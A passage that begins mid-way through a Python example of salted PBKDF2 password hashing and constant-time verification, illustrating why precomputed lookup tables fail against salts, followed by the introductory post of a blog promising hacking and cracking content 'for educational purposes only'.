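    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + dk.hex()


def verify_salted(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(dk.hex(), dk_hex)


def lookup_salted(stored: str, table: dict):
    """The precomputed table never matches: the salt makes each user's hash unique."""
    return table.get(stored.split("$")[1])
```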

First post !

Welcome to my blog !

I am starting off this blog so that I can dump all the “information” (that is lying in a very disorganized way on my laptop) in one place. I also hopefully will reduce the number of typos I make on the keyboard as the posts progress.

All the blog posts will mostly be related to hacking/cracking. I hope you guys can learn something from the posts. If you are already uber or l33t, then still hang around and comment on the blog posts so that I can improve them.

OK HERE GOES…

I would like to state that all information provided in this blog henceforth should be used for educational purposes only. All the data which will be available for download also must be used in a good sense. I am in no way responsible if you decide to use it in the wrong way.

“HACKING SHOULD BE ETHICAL”😛
